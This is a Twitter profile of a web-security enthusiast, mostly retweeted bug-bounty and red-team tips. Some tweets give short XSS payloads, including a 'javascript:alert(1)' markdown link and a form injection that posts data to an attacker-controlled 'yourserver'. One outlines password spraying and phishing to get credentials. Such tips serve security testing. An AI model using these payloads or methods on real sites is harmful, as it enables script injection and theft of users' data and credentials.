Pataliputra

@Pataliputra2

Web and API Security enthusiast.

Joined July 2019.

Tweets


  1. Retweeted
    Feb 2

    This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else.

  2. Retweeted
    Feb 1
  3. Retweeted
    Feb 1
  4. Retweeted
    Jan 31

    After showing a tool which remotely enumerates&destroys an cable if connected to a blue team controlled WiFi (for Internet upstream), made a clear point that this is not how the cable should be deployed. So I ported the tool to NMAP scanner 1/2

  5. Retweeted

    »_ everything is not as it seems. 🎃 «input»; p=-alert(1)}//\ * var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"}; «input»; p=\&q=-alert(1)// * var n = {a: "\", b: "-alert(1)}//"};

  6. Retweeted
    Jan 31
  7. Retweeted
    Jan 31

    If an application uses markdown, make sure to test it for xss. I used [Click here](javascript:alert(1)), to create a link via markdown and when the user clicks on Click here, the xss will get executed. Read this article.

  8. Retweeted

    🎉 New blogpost :) Quick blogpost about how I found an OOM/DoS bug in a famous / package using coverage-guided fuzzer. ➡️ Fuzzer: Jsfuzz by ➡️ Target: wasm-parser ➡️ Bug: DoS/OOM

  9. Retweeted
    Jan 30

    I would suggest everyone to take a look at his blog post about Windows Firewall, where he covers into the details on how you can mitigate lateral movement in AD

  10. Retweeted
    Jan 30
  11. Retweeted
    Jan 30

    Two new videos: Exploitation of GraphQL () and exploitation of SVG XSS ()!!

  12. Retweeted
    Jan 30
  13. Retweeted
    Jan 30
  14. Retweeted
    Jan 30
  15. Retweeted
    Jan 29

    How to Red Team #1 - A twitter red team mind map Need credentials from the outside? 1. OSINT (Find e-mail/PII) 2. Social Engineer (Trick someone into clicking an e-mail you sent them w/o a payload) 3. Target External Services (Password Spray or find a vulnerable service )

  16. Retweeted
    Jan 30
  17. Retweeted
    Jan 29
  18. Retweeted
    Jan 29

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

  19. Retweeted
    Jan 29
  20. Retweeted
    Jan 28

    of Twitter, when testing an API, what tools do you use? Curl? Burp? Fiddler? Powershell? Custom Scripts? Are there certain situations where one is more applicable than the other? Love to read any blogs on the subject. I bet has one somewhere..
